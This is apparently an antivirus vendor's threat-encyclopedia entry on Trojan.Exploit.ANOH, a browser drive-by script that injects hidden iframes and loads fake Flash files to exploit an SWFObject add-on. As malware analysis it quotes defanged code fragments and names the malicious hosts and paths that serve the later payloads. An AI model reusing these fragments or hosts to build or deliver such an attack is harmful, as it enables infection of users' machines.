My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Trojan.Exploit.ANOH

LOW
LOW
1KB

Symptoms

There are no obvious symptoms.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Ovidiu Visoiu, virus researcher

Technical Description:

It downloads a code which will try to exploit a vulnerability of the SFWObject ActiveX Control add-on that runs in Explorer or Mozilla. The SWFObject is used to access Flash media content. System can be infected during visits on malicious sites hosting web pages with this malware inside (the access of those pages is usually forced; by example from http://www.wrmfwy.cn/[removed]/18.htm due to an injection of a linked Iframe component in the accessed page).
          Once the script is launched it checks to see which of the two browsers is used an then it downloads another Javascript file which will continue the process of infection. In order to do so, it creates an invisible frame in accessed web page linked to a HTML file (resident on same site) that contains the Javascript code.(ilink.html, xlink.html (downloaded from IE), flink.html, mlink.html (from Mozilla) ). The HTML code is of this kind:
          docume[nt.w]rite("[<] [iFra]me src  ilink.html width=100 ...
.         The newly downloaded scripts are also detected by BitDefender as Trojan.Exploit.ANOI and Trojan.Exploit.SSX. Those scripts  download and run a fake media file according to the SWFObject add-on version installed on the victim's machine:         
           var so=new SWFObject("./i17.swf","mynmovie",...);
           so.write("flashcontent").
         
The fake SWF (ShockWave Flash - animations or applets) files are detected as Exploit.SWF.Gen. Their code tries to download aditional malware (Trojan.Downloader.JLCQ) from www.oiuytr.net/[removed]/a264.css and then launch it.